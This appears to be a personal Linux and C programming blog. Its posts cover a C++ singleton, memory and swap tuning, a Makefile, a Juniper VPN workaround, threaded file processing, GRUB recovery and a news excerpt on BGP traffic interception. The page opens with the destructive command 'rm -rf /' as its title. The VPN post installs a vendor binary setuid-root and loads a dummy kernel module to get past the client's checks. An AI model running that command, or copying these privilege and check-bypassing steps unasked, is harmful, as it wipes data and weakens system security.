rm -rf /

Singleton in a header only library

2012-01-07T14:26:00.000+05:30

Static member variables are inevitable in singleton implementations. If we define the static member variable in the header file and include it in more than one source file, the linker would throw multiple definition errors when trying to link the translation units. So it is a little tricky to design the singleton in header only implementations. Nevertheless it is not difficult.

C++ allows static members variables of class templates to be defined in more than one translation unit. The linker would merge multiple definitions into one. This is found abundant in the Boost library.

If we don't want to use the templates, but stick with the definite class approach, then this is one way to achieve singleton in the header only library implementation.

Log.hpp - This provides a singleton logger instance.

#include 
#include 

namespace Home { namespace Arun {

class Log
{
public:
    static void Init(std::string& logPath, std::string& logFilename,
                     int32_t maxFileSize);
    static Log* Instance();
    static void Destroy();

private:
    static Log* MyInstance(Log* pLog);

    Log(std::string& logPath, std::string& logFilename, int32_t maxFileSize) :
        m_logPath(logPath),
        m_logFile(logFilename),
        m_maxSize(maxFileSize)
    { }

    ~Log()
    { }

    Log(const Log& log);
    Log operator=(const Log& log);

    std::string m_logPath;
    std::string m_logFile;
    int32_t m_maxSize;
};

inline void Log::Init(std::string& logPath, std::string& logFilename,
                      int32_t maxFileSize)
{
    Log* ptr = new Log(logPath, logFilename, maxFileSize);
    MyInstance(ptr);
}

inline Log* Log::Instance()
{
    return MyInstance(NULL);
}

inline Log* Log::MyInstance(Log* ptr)
{
    static Log* myInstance = NULL;
    if (ptr)
        myInstance = ptr;
    return myInstance;
}

inline void Log::Destroy()
{
    Log* pLog = MyInstance(NULL);
    if (pLog)
        delete pLog;
}

} }

Log.cpp - A sample usage of the above library

#include "Log.hpp"

using namespace Home::Arun;

int main()
{
    std::string logPath = ".";
    std::string logFile = "Test.log";
    Log::Init(logPath, logFile, 1024*1024);
    Log* pLogInst = Log::Instance();
    std::cout << pLogInst << std::endl;
    Log::Destroy();
}

swappiness and drop_caches

2011-12-25T03:55:00.000+05:30

In high performance computing it is common for applications to have all of the data in the physical memory to meet performance criticality. When multiple processes communicate, as we know, shared memory serves as the fastest way of IPC. Any such typical application would initialize the shared memory by loading the data from the disk into the shared memory. Now a question arises - what is the maximum data size that an application can hold in the physical memory, of course, without swapping.

For the sake of discussion, if we are given a 64GB of RAM, at max, how many giga byte of physical memory (RAM) can I allocate to my data, keeping in mind that the fewer I allocate, the more boxes I would require to split the data gallery.

As a test, I wrote a small app to do what I described above. As it loaded around 19 GB of data into the RAM, the kernel started using swap. After loading 25 GB, the swap usage exponentially increased and at one point in time, it stopped responding and I had to physically bounce the box (plug off and plug in again). This din't make sense to me at the beginning.

At first, why would the kernel swap if there is enough RAM? I did a man proc and searched for "swap". I happened to read about /proc/sys/vm/swappiness - a parameter which defines the kernel's tendency to swap. The default value of swappiness on RHEL5 is 60. As the "used" RAM size reaches 60% of the total RAM size, the kernel would being to swap.

In my case, 60% of 64 GB is 38.4 GB. But my data size was 19 GB when the kernel started to swap. Where did the remaining 19GB go, eventually leaving my box in a non-responsive state?! Again intriguing. I could not find the relation between the data size and the memory required to store it.

Few more runs and a close memory monitoring showed that the kernel caches all the data (yes, almost all the data that are used very recently). Thus, if an application has loaded 2GB of data into the memory, the kernel would cache 4GB. 2 GB for the actual shared memory data and 2GB of unused cache using which the data was read/copied into the shared memory. On a typical server environment (runlevel 3), you wouldn't expect this to happen, since apart from the main apps no other applications will be running (like yum-updatesd, vlc, rhythmbox, etc). One would expect the kernel to drop the unused cache immediately. proc man page again showed one other important parameter - /proc/sys/vm/drop_caches. This entry point is helpful in instructing the kernel to drop the unused cache.

To free pagecache:
# echo 1 > /proc/sys/vm/drop_caches

To free dentries and inodes:
# echo 2 > /proc/sys/vm/drop_caches

To free pagecache, dentries and inodes:
# echo 3 > /proc/sys/vm/drop_caches

Mind the space between before the > symbol.

When an application loads all the data into the memory during its initialization and then never tends to read the disk, drop_caches is a real boon. In my case above, I was able to load 60 GB of data into the shared memory and share it with the other processes. The technique was to clear the cache frequently as the application initialized.

while :; do

    echo 3 > /proc/sys/vm/drop_caches

    sleep 30

done

As a thumb rule, swappiness must be set to 0 (echo 0 > /proc/sys/vm/swappiness or via sysctl.conf) before the application starts and the drop_caches must be set to 3 periodically to avoid any kind of swaps and performance degradations.

Once the app has been initialized and all the 60GB has been loaded into the memory, the while loop to drop the unused cache is not needed and it can be terminated safely. But the moment you do a huge file read, don't forget to run the script in the background, of course, as root. The need to drop_caches entirely depends on your application. Setting swappiness to 0 is ideal in my opinion for all the server environments.

EDIT:

Here is the vmstat usage for the below content, when the swappiness was set to 60 and drop_caches was not triggered (by default its value will be 0): http://codepad.org/6pXz0UOH

18:46:22 ~/MySpace/files-to-load# ls -l
total 4198384
-rw-r--r-- 1 root root 1073731945 Jan  2 18:39 7
-rw-r--r-- 1 root root 1073731945 Jan  2 18:39 8
-rw-r--r-- 1 root root 1073731945 Jan  2 18:40 9
-rw-r--r-- 1 root root 1073731945 Jan  2 18:40 10
18:46:22 ~/MySpace/files-to-load#

For the same content, vmstat log when swappiness is set to 0 and frequent echo 3 on drop_caches: http://codepad.org/9bNwcdbW

GNU make: sample Makefile

2011-08-27T01:00:00.001+05:30

At work, when I started to work on the existing projects, I found that the core libraries were committed into the repository of every other SDK. For instance, if liba.so is used by SDK1 and SDK2, the library was found both in SDK1's repo and in SDK2's repo. Since we had varieties of core libraries (which are inturn SDKs to me) cattering different purposes like image decoding, enhancement, extraction, and so on, you can imagine the amount of repo space wasted in having the duplicate copy of these libraries in every repository. Also, whenever my friends in Tokyo release a new version of the library, the convention was to push that library into the repo, there by creating its own changeset. My basic idea was to have a seamless build system for all of the components that we develop and deliver, which will integrate well with the core libraries at build time as well as at runtime. The goal was to build

1. On 32 and 64 bit Linux.
2. Using specific versions of the core libraries.

Since this is a very common and simple problem on Linux, I thought I can address this by resorting to the pkg-confing. I tried a couple of examples with it and it worked well. But once the integration of core library version is taken into account, pkgconfig stuff was getting complicated.

So I decided to have a separate directory structure for the core libraries.

A
|-- doc
|   |-- chm
|   |-- man
|   `-- pdf
|-- include
|-- lib
|   `-- linux
|       |-- 32
|       |   `-- gcc412
|       |       |-- dynamic
|       |       |   |-- debug
|       |       |   `-- release
|       |       `-- static
|       |           |-- debug
|       |           `-- release
|       `-- 64
|           `-- gcc412
|               |-- dynamic
|               |   |-- debug
|               |   `-- release
|               `-- static
|                   |-- debug
|                   `-- release
`-- sample

I had two advantages with this approach.

1. No duplicate copies in the SDKs.
2. No confusion over the core library version differences across SDKs.

In addition, every SDK can hold a core library version control file, which I termed as Corelibs.cfg. At runtime, preferably during initialization, the SDKs can invoke the get_version API on every library which can be cross verified against its version in the Corelibs.cfg. If there is a version mismatch, the SDK may not proceed further, throwing an exception.

To achieve all these, I needed a build system and I chose GNU make. Here is a sample Makefile.

mode       := release
CC         := gcc
v          := 0
cov        := 0
arc        := 64
ifeq ($(cov), 0)
else
	COV_CFLAGS = -fprofile-arcs -ftest-coverage
	COV_LFLAGS = -lgcov
endif

DEFINES = 

# Make sure CORE_LIB_PATH is available.
CORE_LIB_FILE = "Corelibs.cfg"

# Include variables corresponding to the Corelibs. Populate it from the corelibs version control file.
CORE_COMMON := $$CORE_LIB_PATH/Common/include
A_INC  := $$CORE_LIB_PATH/A/$(shell awk -F" = " '/^A/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
B_INC  := $$CORE_LIB_PATH/B/$(shell awk -F" = " '/^B/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
C_INC  := $$CORE_LIB_PATH/C/$(shell awk -F" = " '/^C/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
D_INC  := $$CORE_LIB_PATH/D/$(shell awk -F" = " '/^D/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
E_INC  := $$CORE_LIB_PATH/E/$(shell awk -F" = " '/^E/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
F_INC  := $$CORE_LIB_PATH/F/$(shell awk -F" = " '/^F/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/include
# End variable formation

INCPATH = -isystem $(CORE_COMMON) -isystem $(A_INC) -isystem $(F_INC) \
		  -isystem $(C_INC) -isystem $(D_INC) -isystem $(E_INC) \
		  -isystem $(B_INC)

A_LIB  := -L$$CORE_LIB_PATH/A/$(shell awk -F" = " '/^A/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release
B_LIB  := -L$$CORE_LIB_PATH/B/$(shell awk -F" = " '/^B/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release
C_LIB  := -L$$CORE_LIB_PATH/C/$(shell awk -F" = " '/^C/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release
D_LIB  := -L$$CORE_LIB_PATH/D/$(shell awk -F" = " '/^D/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release
E_LIB  := -L$$CORE_LIB_PATH/E/$(shell awk -F" = " '/^E/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release
F_LIB  := -L$$CORE_LIB_PATH/F/$(shell awk -F" = " '/^F/ { print $$2 }' $(CORE_LIB_FILE) 2>/dev/null)/lib/linux/$(arch)/gcc412/dynamic/release

ifeq ($(mode), release)
	flag := -O2
else
	flag := -g3
endif
CFLAGS += $(flag) -Wall -W -Wextra -Wno-override-init -Werror -std=gnu99

OBJDIR := .objs
OBJS = $(addprefix $(OBJDIR)/, genutils.o string-funcs.o thread.o http-receiver.o \
         heartbeat.o read-config.o config-settings.o log.o http.o)

CORE_LIBS = $(A_LIB) -la $(B_LIB) -lb $(C_LIB) -lc $(D_LIB) -ld $(E_LIB) -le $(F_LIB) -lf
EXTERNAL_LIBS = -lcurl
SYSTEM_LIBS = -lpthread
TARGET = sdk1

.PHONY: all
all: $(TARGET)

$(OBJS): | $(OBJDIR)

$(OBJDIR):
	@mkdir -p $(OBJDIR)

$(OBJDIR)/%.o: %.c
	@if test ! -d $$CORE_LIB_PATH; then echo "Invalid CORE_LIB_PATH: $$CORE_LIB_PATH. Please make sure the directory exists."; exit 1; fi
	@if test ! -f $(CORE_LIB_FILE); then echo "Invalid $(CORE_LIB_FILE). Please make sure the core library version control file exists."; exit 1; fi
ifeq ($(v), 0)
	@echo "[$(CC)]	$(@F)"
	@$(CC) -c -m$(arch) $(CFLAGS) $(INCPATH) $(COV_CFLAGS) $(DEFINES) -o $@ $^
else
	$(CC) -c -m$(arch) $(CFLAGS) $(INCPATH) $(COV_CFLAGS) $(DEFINES) -o $@ $^
endif

$(TARGET): $(OBJS)
ifeq ($(v), 0)
	@echo "[$(CC)]	$(@F)"
	@$(CC) -m$(arch) $(LD_FLAGS) -o $@ $(OBJS) $(SYSTEM_LIBS) $(EXTERNAL_LIBS) $(CORE_LIBS) $(COV_LFLAGS)
else
	$(CC) -m$(arch) $(LD_FLAGS) -o $@ $(OBJS) $(SYSTEM_LIBS) $(EXTERNAL_LIBS) $(CORE_LIBS) $(COV_LFLAGS)
endif

clean:
	find . -name "*.o" -o -name "*.gcno" -o -name "*.gcda" -o -name "*.info" | xargs rm -f
	rm -f $(TARGET)

As you can see, the above Makefile takes care of most of the things, starting from linking with the version of the libraries mentioned in the Corelibs.cfg, code coverage, releasing debug or release version of the SDK. When we need to run the above SDK, we can have a shell script that parses the Corelibs.cfg and sets its LD_LIBRARY_PATH to the corresponding paths.

Although it may seem a little complicated for beginners, this will become very simple if we understand the GNU make's variables and conventions.

1. $$VAR - An environment variable that needs to be used inside the makefile will have this notation. ie, you override the $ with a $$.
2. $(VAR) - Normal variable in Makefile.
3. shell - envokes a shell
4. ifeq, else, endif - GNU make internal variables.

I din't want to include the unit tests into the Makefile and make it look cluttered, as we have the habit of copying a standardized Makefile like this across the projects.

When you want to build, you can do the following:

make clean && make
make clean && make mode=debug arch=32 v=1 cov=1

Unfortunately, we don't have such a powerful tool on Windows. Inspite of writing a highly portable C/C++ code, when compared with building, running and releasing the SDK on Linux, doing the same thing on Windows is a time consuming job.

GCC 4.5.2 warning: initialized field overwritten

2011-08-20T04:30:00.000+05:30

GCC is my favourite compiler, obviously because, its open source, GPL and it builds Linux. I prefer to use -Wall -Wextra -W -Werror options as it captures most of the bugs before in hand.

I have been working on the new XIM (extreme identity matcher) development very recently. I wanted to override the default initialization values that I gave to my struct with a local value - similar to the constructors for local objects in C++.

The code roughly looks like this.

#include 
struct A {
    int x;
    int y;
};

#define A_DEFAULTS .x = 0, .y = 0
int main(void)
{
    struct A a = {
        A_DEFAULTS,
        .y = 3
    };
    printf("a.x: %d a.y: %d\n", a.x, a.y);

    return 0;
}

The code compiles well without -W or -Wextra options. Once the extra warning flags are added, GCC starts throwing error:

04:20:38:~/Programs$ gcc 1.c -o 1 -Wall -W -Werror -std=c99
cc1: warnings being treated as errors
1.c: In function ‘main’:
1.c:23:9: error: initialized field overwritten
1.c:23:9: error: (near initialization for ‘a.y’)
04:20:43:~/Programs$

Totally weird. I know that this is a valid construct. Since I prefer to use -Werror switch, my code won't even compile and I'm forced to remove the switch. This may be a bug in GCC. I'm not sure. Although it won't break my design, I don't want to assign the values to my structure members after the structure members are initialized. BTW, I'm running Ubuntu 11.04 with GCC 4.5.2.

Update:

Section 6.7.8 of C99 standards clearly mentions the following about initializer list:

The initialization shall occur in initializer list order, each initializer provided for a particular subobject overriding any previously listed initializer for the same subobject; all subobjects that are not initialized explicitly shall be initialized implicitly the same as objects that have static storage duration.

Any initializer for the subobject which is overridden and so not used to initialize that subobject might not be evaluated at all.

I would like to highlight the point here:

Any initializer for the subobject which is overridden and so not used to initialize that subobject might not be evaluated at all.

Connecting to Juniper VPN from Linux

2010-11-17T03:22:00.005+05:30

Steps for connecting to VPN from our Linux Desktop (Tested on 32 bit, yet to test on 64 bit).

The host checker application will load some Java browser components and will download some scripts, along with a couple of ELF binaries to ~/.juniper_networks/. We must have Java and Java plugin for firefox to work.

1. Make sure you have sun-java-jdk installed along with the browser plugin (not openjdk, which will provide you the IceTea plugin) for the above browser component to work (bad that its not working with openjdk). You can check your distribution repository for sun-java-jdk or you can download the Linux binary from Sun Java website.

Ubuntu: "sudo aptitude install sun-java6-plugin sun-java6-jdk sun-java6-jre"

2. Open firefox (no matter what, the host checker doesn't work on chrome) and check in about:plugins that you have the java plugin enabled.

3. Verify the plugin actually works at: http://www.java.com/en/download/installed.jsp

4. Open https://your-official-url

5. A page ask for permission to download and execute the host checker software (tncc.jar). Choose Yes/Always.

6. It would then redirect us to the login screen where we get authenticated and enter into the system.

7. So far, if you have run the browser on a normal user mode, then "Java Secure Application Manager" will not work any further. You will have to invoke the browser from superuser(root) privilege for this to work with VPN. If not the Java plugin won't have the privilege to assign us a tunnel IP address. Everytime you connect to the VPN, you have to run the browser in superuser privilege, which is NOT A SECURE practise. I can't think of any other dumbest thing other than to run a browser in superuser mode.

8. Click on Network Connect::Start. It will open a xterm for us to enter the root password for the 'installation'. Enter the password. It will do the installation. We are good to go now. If you are not on Ubuntu, skip to step 15.

9. If you are on Ubuntu(like me), as you might know, root account is disabled. So the above installation would fail. There won't be any error message as you would expected, but its quite obvious. It will redirect you back to your homepage.

Time to do some basics.
10. Click on Network Connect::Start. The same authentication window again. Just don't do anything. Let the xterm be as it is.

11. Open a terminal and cd ~/.juniper_networks/tmp/

12. You will see the following files:

00:50:28 ~/.juniper_networks/tmp$ ll
total 2864
drwxr-xr-x 2 arun arun    4096 2010-11-17 00:47 META-INF
-rw-r--r-- 1 arun arun    1829 2010-11-17 00:47 xlaunchNC.sh
-rw-r--r-- 1 arun arun      16 2010-11-17 00:47 version.txt
-rw-r--r-- 1 arun arun 1175432 2010-11-17 00:47 ncsvc
-rw-r--r-- 1 arun arun   79292 2010-11-17 00:47 ncdiag
-rw-r--r-- 1 arun arun     721 2010-11-17 00:47 installNC.sh
-rw-r--r-- 1 arun arun 1603632 2010-11-17 00:47 libncui.so
-rw-r--r-- 1 arun arun   46207 2010-11-17 00:47 NC.jar
-rw-r--r-- 1 arun arun     770 2010-11-17 00:47 getx509certificate.sh
00:50:28 ~/.juniper_networks/tmp$

13. Try to explore the installNC.sh (as the name implies it is the installation script for the network_connect application). It tries to install a ELF binary ncsvc in network_connect directory and since the root account is not available, it keeps failing. So why give it hard time? You can do:

sudo install -m 6711 -o root ncsvc ../ncsvc

Also copy the version.txt to ../ (If not the installation script will call the xterm for every run and fail. But we will still be able to connect to VPN). Remember that we are allowing the "Network connect" to fail and then make it work from behind.

14. Job done. Now just kill the xterm invoked by the browser.

15. It would popup saying that the modprobe of Tun driver has failed. Juniper guys are not aware that the tunneling module has now been inbuilt into the kernel and their installation script does a modprobe for tun driver. This error message will continue to appear everytime we start network connect.

16. Again, a simple way to fix this is to (this applies to all Linux distros):

sudo chown root:root installNC.sh xlaunchNC.sh.

But we will face timeout issues, since the application has an event loop that will kill the session, cus the tun module initialization had failed.

To work around this, I had built a dummy kernel module and named it tun and installed it in kernel. When the network-connect starts next time, it won't fail looking for tun driver, rather load my dummy module and notify its event loop that he is running perfect ;).

17. Once everything is done, it will open a small java application (the event loop I was referring to) that will assign us an IP address and show the number of bytes sent and received. This shouldn't have worked if tun driver is not in the kernel. Poor Juniper guys! We are buying their product and not for free!

We are all set and good to go. We had to do all these tricks only cus, on Ubuntu we won't have a root account. Those who work on Debian/Gentoo/Fedora, we can run firefox once in superuser mode to avoid all these workarounds, and do:

tar cfj juniper.tar.bz2 /root/.juniper_networks

Extract the above archive in our home directory and change the permissions accordingly. Don't modify the permissions of ncscv alone!! If you know to use cp -prd, then its an alternative for tar cfj. I must mention that you will still have to do steps starting from step 15 (building a dummy module) to avoid timeout issues.

The final working structure of ~/.juniper_networks/ will be as follows:

02:39:07 ~/.juniper_networks$ ls -lR
.:
total 1432
-rw-r--r-- 1 arun arun    1277 2010-11-17 02:02 dsHCLauncher_linux1.log
-rw-r--r-- 1 arun arun 1253983 2010-08-03 11:33 ncLinuxApp.jar
drwxr-xr-x 2 arun arun    4096 2010-11-17 02:02 network_connect
drwxr-xr-x 2 arun arun    4096 2010-11-17 02:09 tmp
-rw-r--r-- 1 arun arun  191973 2010-08-03 11:57 tncc.jar
-rw-r--r-- 1 arun arun      15 2010-11-17 00:10 whitelist.txt

./network_connect:
total 2860
-rw-r--r-- 1 arun arun     150 2010-11-17 02:02 installnc.log
-rwxr--r-- 1 arun arun     721 2010-11-17 01:35 installNC.sh
-rw-r--r-- 1 arun arun 1603632 2010-11-17 02:02 libncui.so
-rw-r--r-- 1 arun arun       0 2010-11-17 01:35 missing.info
-rwxr--r-- 1 arun arun   79292 2010-11-17 02:02 ncdiag
-rw-r--r-- 1 arun arun   46207 2010-11-17 02:02 NC.jar
-rws--s--x 1 root root 1175432 2010-11-17 01:05 ncsvc
-rw-r--r-- 1 root root       0 2010-11-17 01:07 ncsvc.log
-rw-r--r-- 1 arun arun       0 2010-11-17 00:12 ncui.log
-rw-r--r-- 1 arun arun      16 2010-11-17 01:36 version.txt
-rwxr--r-- 1 arun arun    1831 2010-11-17 01:59 xlaunchNC.sh

./tmp:
total 0

Final notes:

I've not tried Java Secure Application Manager" and I'm not sure what it is used for.
I am happy with ssh and that's the power of Linux.

Code for dummy tun module:

#include 
#include 
int init_module(void)
{
   return 0;
}

void cleanup_module(void)
{
   return;
}

Makefile for the same:

obj-m += tun.o
all:
 make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
clean:
 make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean

To install the module into the kernel:

#include 
sudo install tun.ko /lib/modules/`uname -r`/kernel/net/tun.ko
sudo depmod -a
sudo modprobe tun

Multithreaded application to process files in a directory

2010-04-02T12:01:00.005+05:30

We may encounter scenarios when we need to do a defined set of operation on all the files in a directory. This very simple program is a typical example of how the problem can be approached with a mutex and a shared resource, by constantly creating new threads for new files instead of waiting for all the worker threads to complete.

#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define NAME_MAX                (256)
/* #define MAX_THREADS          (99) */
#define SLEEP_DUR               (1)

struct thread_data {
    char file_name[NAME_MAX+1];
};

static int num_threads;

static pthread_cond_t cond;
static pthread_mutex_t count_mutex;

int select_filter( struct dirent *entry )
{
    /* Filesystem differences with EXT4 and JFS2 - Unable to use d_type member
     * to compare DT_REG to check for the filetype */
    if (!strcmp(entry->d_name, ".") || !strcmp(entry->d_name, ".."))
        return 0;
    else
        return 1;
}

void *process_file( void *arg )
{
    struct thread_data *data_t = (struct thread_data *)arg;
    unsigned int i, j;
    pthread_t p = pthread_self();
    /* Do some processing with data_t */
    fprintf( stdout, "%ld: Processing file %s\n", (unsigned long int)p, data_t->file_name );
    unlink( data_t->file_name );
    /* When done processing, free the resources */
    free( data_t );

    for (i=0; i< 9999; i++)
        for (j=0; j< 9999; j++);

    /* fprintf( stdout, "%p: Locking Mutex\n", (void *)p); */
    pthread_mutex_lock( &count_mutex );
    /* Critical section */
    num_threads --;
    /* fprintf( stdout, "%p: Signaling\n", (void *)p); */
    pthread_cond_signal( &cond );
    /* fprintf( stdout, "%p: Unlocking Mutex\n", (void *)p); */
    fprintf( stdout, "%d: Exiting. num_threads: %d\n", p, num_threads);
    pthread_mutex_unlock( &count_mutex );
    pthread_exit( NULL );
    return NULL;
}

int main(int argc, const char *argv[])
{
    struct dirent **file_list = NULL;
    short int no_of_files = 0;
    char *dir_name = "/u/home/raddanki/Arun/Threads/data";
    short int idx = 0;
    struct thread_data *data_t = NULL;
    int MAX_THREADS = 0;

    pthread_t tid = -1;
    pthread_attr_t attr;

    /* Get the arguments */
    if (argc < 2) {
        printf( "Usage: %s \n", argv[0] );
        exit(0);
    }

    MAX_THREADS = atoi( argv[1] );
    if (MAX_THREADS < 1 && MAX_THREADS > 99) {
        printf( "Max threads should be between 1 and 99. Provided: %d\n", MAX_THREADS );
        exit(0);
    }

    /* Initialize thread attributes */
    pthread_cond_init( &cond, NULL );
    pthread_mutex_init( &count_mutex, NULL );
    pthread_attr_init( &attr );
    pthread_attr_setdetachstate( &attr, PTHREAD_CREATE_DETACHED );

    while (1) {

        while (no_of_files == 0) {
            /* Open the dir for reading */
            pthread_mutex_lock( &count_mutex );
            if (num_threads == 0) {
                if (file_list)
                    free( file_list );
                if ((no_of_files = scandir( dir_name, &file_list, select_filter, alphasort )) == -1) {
                    fprintf( stdout, "Failed to open dir: %s\n", dir_name );
                    /* need to wait for threads to complete and then exit */
                    exit (1);
                }
            }
            pthread_mutex_unlock( &count_mutex );
            idx = no_of_files - 1;
            if (!no_of_files) {
#ifdef DEBUG
                if (num_threads == 0) {
                    free( file_list );
                    pthread_attr_destroy( &attr );
                    pthread_mutex_destroy( &count_mutex );
                    pthread_cond_destroy( &cond );
                    pthread_exit(0);
                }
#endif
                fprintf( stdout, "Going to sleep now\n" );
                sleep(SLEEP_DUR);
            }
        }

        /* fprintf( stdout, "MAIN: Locking Mutex\n" ); */
        /* while (1) { */
        pthread_mutex_lock( &count_mutex );
        if (num_threads == MAX_THREADS) {
            /* Let the threads finish */
            /* fprintf( stdout, "MAIN: Waiting on condition\n" ); */
            pthread_cond_wait( &cond, &count_mutex );
            fprintf( stdout, "MAIN: Waking up from condition\n" );
            /* fprintf( stdout, "MAIN: Unlocking Mutex\n" ); */
        }
        pthread_mutex_unlock( &count_mutex );
        /* else */
        /* break; */
        /* } */

        /* Be sure about the boundaries in File[] */
        if (num_threads > MAX_THREADS) {
            fprintf( stdout, "Prevented severe memory error %d\n", num_threads );
            exit(2);
        }
        if (((data_t = calloc( 1, sizeof(struct thread_data) )) == NULL)) {
            fprintf( stdout, "Failed to allocate memory\n" );
            exit(1);
        }

        snprintf( data_t->file_name, sizeof(data_t->file_name), "%s/%s", dir_name, file_list[idx]->d_name );
        free(file_list[idx--]);
        no_of_files--;
        fprintf( stdout, "MAIN: No of files: %d\n", no_of_files );

        /* Manage the thread stuff */
        if (pthread_create( &tid, &attr, process_file, (void *)data_t ) != 0) {
            fprintf( stdout, "Failed to allocate memory for thread\n" );
            exit(1);
        }
        fprintf( stdout, "Created thread: %d\nMAIN: Locking Mutex: %d\n", tid, num_threads );
        pthread_mutex_lock( &count_mutex );
        num_threads++;

        /* fprintf( stdout, "MAIN: Unlocking Mutex 2 - %d\n", num_threads ); */
        pthread_mutex_unlock( &count_mutex );
    }

    return 0;
}

Install Google GO

2009-11-17T21:26:00.013+05:30

To install the Google's GO on Ubuntu Karmic

vim ~/.bashrc && exit (or open a new terminal or . ~/.bashrc)

Add these lines into it:

export GOROOT=$HOME/go
export GOARCH=386
export GOOS=linux
export GOBIN=$HOME/bin
export PATH=$GOBIN:$PATH

The last two are not listed on the GO site, but I needed them to compile.

mkdir ~/bin && chmod 755 ~/bin && . ~/.bashrc
sudo apt-get install python-setuptools python-dev
sudo apt-get install mercurial

To pull the Go source

hg -v clone -r release https://go.googlecode.com/hg/ $GOROOT
sudo apt-get install bison gcc libc6-dev ed make
cd $GOROOT/src && ./all.bash

GRUB Error 17 !!

2008-12-09T23:58:00.002+05:30

Today I was shocked to see this horror on my laptop (Dell XPS M1330) when i returned from office. I had friends visiting my home over the this week. So I guess someone tried using it and pressed the Dell MediaDirect button by accident. This is not the first time it is happening. Back in 2007, one of my friend had pressed that torture button. By then I din't know what to do. So i just reinstalled the OS.

The actual solution to this problem is to press the MediaDirect button again. That will make a clean startup.

But in case you have forgotten it like me and pressed the Dell recovery [Enter=Continue] by mistake, then follow the steps below.

Boot from a live CD
sudo apt-get install testdisk

For this to install through the apt-get, you will have to enable the universe repository. If you are not sure about doing all these, safely download the .deb files from the net. Google for "testdisk ubuntu" and download the .deb file. Also download libntfs8.deb file, which is the shared library that the testdisk has a runtime dependency on. I am sure you will get both in the Ubuntu package repositories. Then do the following:

Copy both the .deb files into a USB and connect the USB to your lappy running the LiveCD
cd /media/Your_USB_drive/
sudo dpkg -i testdisk.deb libntfs8.deb
cd ~
unmount /media/Your_USB_drive/
testdisk

testdisk is a great utility. It will restore the partition that was corrupted by the Dell MediaDirect. Just give Proceed and after it completes restoring (I am sure it will!!) the partitions, give "Save" and reboot your PC. It shoudl load perfect!!

If you still face problem, then don't give up. You have crossed 90% of the hurdle. You just need to reinstall your GRUB. As usual boot into LiveCD and enter

$ grub
> find /boot/grub/menu.lst
hd0,2
> root (hd0,2)
> setup (hd0)
> quit
$ reboot

That is it my friend. You should not have any further problem with GRUB.
The best way to prevent this from occurring is to use gparted and remove the MediaDirect partition altogether. Again boot from the liveCD to run gparted. ;-)

Skype on Ubuntu 8.10 Intrepid Ibex

2008-12-05T19:29:00.002+05:30

I messed up with my previous version of Ubuntu Hardy Heron when I upgraded the kernel. The kernel upgrade had a bug, which did not upgrade the udev. So I was not able to boot on to the linux partition at all.

After this, I was stuck up with Vista for a little too long, to run MATLAB and other windows related stuffs. Now I am back on Ubuntu Intrepid Ibex. Its installation has been a breeze and I must admit that it is the more user friendly version of Linux that I have used so far.

Compiz effects are enabled by default. So if you have the right hardware to support the acceleration, you will enjoy the luxury even during the first boot. Although the compiz effects are enabled, I was not able to see the compiz manager. The X froze when i tried invoking compiz-manager from a terminal. So I did

sudo apt-get install simple-ccsm

Now I was able to see the compiz manager in System->Preferences->Compizconfig settings manager.

Configuring skype had few problems with the audio recording. The test call dropped saying "Problem with the audio capture". So I did the following and rebooted my system to have a clean conference call on Skype. Really, FREE as in Freedom. Love Linux!! :-)

killall pulseaudio
sudo apt-get remove pulseaudio
sudo apt-get install esound
sudo rm /etc/X11/Xsession.d/70pulseaudio

Explode function in C

2008-10-02T12:09:00.011+05:30

Explode function in C. An alternative to the PHP explode() function.

#include 
#include 
#include 

char **explode(char *string, char separator, int *arraySize)
{
        int start = 0, i, k = 0, count = 2;
        char **strarr;
        for (i = 0; string[i] != '\0'; i++){
                /* Number of elements in the array */
                if (string[i] == separator){
                        count++;
                }
        }
        arraySize[0] = count-1;
        /* count is at least 2 to make room for the entire string
         * and the ending NULL */
        strarr = calloc(count, sizeof(char*));
        i = 0;
        while (*string != '\0') {
                if (*string == separator) {
                        strarr[i] = calloc(k - start + 2,sizeof(char));
                        strncpy(strarr[i], string - k + start, k - start);
                        strarr[i][k - start + 1] = '\0'; /* ensure null termination */
                        start = k;
                        start++;
                        i++;
                }
                string++;
                k++;
        }
        /* copy the last part of the string after the last separator */
        strarr[i] = calloc(k - start + 1,sizeof(char));
        strncpy(strarr[i], string - k + start, k - start);
        strarr[++i] = NULL;

        return strarr;
}

Google chrome crashes

2008-09-04T16:25:00.001+05:30

Finally managed to crash Google chrome. Type :% in the address bar. :-)

The Internet's Biggest Security Hole Revealed

2008-08-27T09:25:00.003+05:30

Two security researchers have demonstrated a new technique to stealthily intercept internet traffic on a scale previously presumed to be unavailable to anyone outside of intelligence agencies like the National Security Agency.

The tactic exploits the internet routing protocol BGP (Border Gateway Protocol) to let an attacker surreptitiously monitor unencrypted internet traffic anywhere in the world, and even modify it before it reaches its destination.

The demonstration is only the latest attack to highlight fundamental security weaknesses in some of the internet's core protocols. Those protocols were largely developed in the 1970s with the assumption that every node on the then-nascent network would be trustworthy. The world was reminded of the quaintness of that assumption in July, when researcher Dan Kaminsky disclosed a serious vulnerability in the DNS system. Experts say the new demonstration targets a potentially larger weakness.

"It's a huge issue. It's at least as big an issue as the DNS issue, if not bigger," said Peiter "Mudge" Zatko, noted computer security expert and former member of the L0pht hacking group, who testified to Congress in 1998 that he could bring down the internet in 30 minutes using a similar BGP attack, and disclosed privately to government agents how BGP could also be exploited to eavesdrop. "I went around screaming my head about this about ten or twelve years ago.... We described this to intelligence agencies and to the National Security Council, in detail."

